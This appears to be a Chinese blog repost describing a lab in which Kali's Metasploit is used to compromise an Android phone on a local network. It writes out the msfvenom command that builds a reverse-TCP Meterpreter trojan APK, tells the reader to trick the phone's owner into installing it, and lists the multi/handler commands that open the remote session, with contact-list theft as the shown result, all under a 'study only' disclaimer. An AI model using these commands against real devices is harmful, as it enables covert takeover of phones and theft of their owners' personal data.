zoukankan      html  css  js  c++  java
  • 渗透测试--使用kali入侵局域网手机实验

    声明本文仅限于技术讨论与学习,严禁用于非法途径,否则后果自负。

    原理:借助kali的Metasploit渗透测试框架生成远程木马,然后感染局域网内Android手机,从而实现对被渗透手机数据的读取等。

    实验前准备

        kali虚拟机:192.168.0.102(攻击机)

        win10中间机:用于将kali生成的远程木马发送到Android手机中。

        Android手机:192.168.0.105(靶机)

        Xshell4:用于将在kali上生成的远程木马从kali中导到win10中间机中。

    实验过程

    一、kali生成远程木马

      1.利用msfvenom生成木马病毒,payload选择android/meterpreter/reverse_tcp,后接kali虚拟机的名字和端口:

        msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

          

      2. 检查文件的生成:

          

    二、木马传送

      利用win10中的Xshell4将kali中生成的android.apk传送到指定路径(本实验指定路径为F:),再诱导Android手机(靶机)安装。

      1.用Xshell4连接kali虚拟机并将android.apk传送到指定路径:

           

           

           

       2.将F盘下的android.apk诱导发送到目标靶机上安装。

        目标靶机上安装完成木马后会出现如下图标:

          

     三、目标攻击

      1.msf监听

        kali虚拟机终端依次执行以下命令:

          msfconsole        //启动msfconsole

          use exploit/multi/handler  //加载模块

          set payload android/meterpreter/reverse_tcp  //选择payload

          set LHOST 192.168.0.102

          set LPORT 8888

          exploit          //开始执行漏洞,开始监听,等待目标上线 

        

       在目标手机上点一下木马文件(没有页面),则可成功建立攻击会话:

        

       查看上述文件:

    上述实验演示的是窃取目标靶机通讯录,如果对其他命令感兴趣的话可通过help命令自行尝试。

    提醒本实验仅用于技术讨论与学习,严禁用于非法途径,否则后果自负。

  • 相关阅读:
    【selenium学习高级篇 -31】Jenkins中Project的相关配置
    【selenium学习高级篇 -30】Jenkins新建一个Project
    【selenium学习高级篇 -29】Jenkins的简单介绍和安装
    【selenium学习中级篇 -28】封装一个日志类
    【selenium学习中级篇 -27】Python读取配置文件
    JVM类加载机制
    Java虚拟机JVM及垃圾回收机制
    数组在内存中的分配
    wait 和 sleep 的区别
    Cloneable 接口实现原理
  • 原文地址:https://www.cnblogs.com/ljwhq/p/13755968.html
Copyright © 2011-2022 走看看